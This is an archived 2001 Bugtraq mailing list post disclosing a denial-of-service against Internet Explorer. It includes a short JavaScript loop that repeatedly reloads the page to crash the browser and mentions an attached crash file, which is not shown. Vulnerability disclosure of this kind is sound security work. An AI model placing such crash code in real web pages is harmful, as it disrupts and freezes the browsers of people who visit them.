Bugtraq mailing list archives
MSIE DoS Using javascript
From: Tom Micklovitch <h_bugtraq () yahoo com>
Date: Thu, 20 Dec 2001 02:14:32 -0800 (PST)
sorry 'bout the >'s - message got returned 1st time.
ATTACHMENT part 2 message/rfc822
Just playing around with pasting from clipboard
and eternal loops, found an interesting DoS
Attack attached (zipped) html file explains
all.
here's the code snippet:
function paster(){
for(count=0;count<1000000;count++) {
self.location = self.location;
}
}
ATTACHMENT part 2.2
application/x-zip-compressed name=crash.zip ===== Be Afraid. Be VERY Afraid. __________________________________________________ Do You Yahoo!? Check out Yahoo! Shopping and Yahoo! Auctions for all of your unique holiday gifts! Buy at http://shopping.yahoo.com or bid at http://auctions.yahoo.com
Current thread:
- MSIE DoS Using javascript Tom Micklovitch (Dec 20)
